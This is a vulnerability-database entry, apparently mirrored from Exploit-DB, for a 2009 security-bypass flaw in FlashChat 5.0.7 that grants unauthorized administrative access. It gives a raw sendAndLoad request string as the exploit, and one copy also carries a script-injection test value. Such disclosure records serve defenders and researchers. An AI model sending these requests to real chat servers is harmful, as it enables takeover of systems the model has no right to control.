header-logo
Suggest Exploit
vendor:
FlashChat
by:
Secunia Research
8.8
CVSS
HIGH
Security-Bypass
N/A
CWE
Product Name: FlashChat
Affected Version From: FlashChat 5.0.7
Affected Version To: FlashChat 5.0.7
Patch Exists: No
Related CWE: N/A
CPE: a:topcmm:flashchat:5.0.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

FlashChat Security-Bypass Vulnerability

An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application. sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=&m=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

Mitigation:

Restrict access to the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31800/info

FlashChat is prone to a security-bypass vulnerability.

An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application. 

sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

Navigation

Suggest Exploit

Services By CQR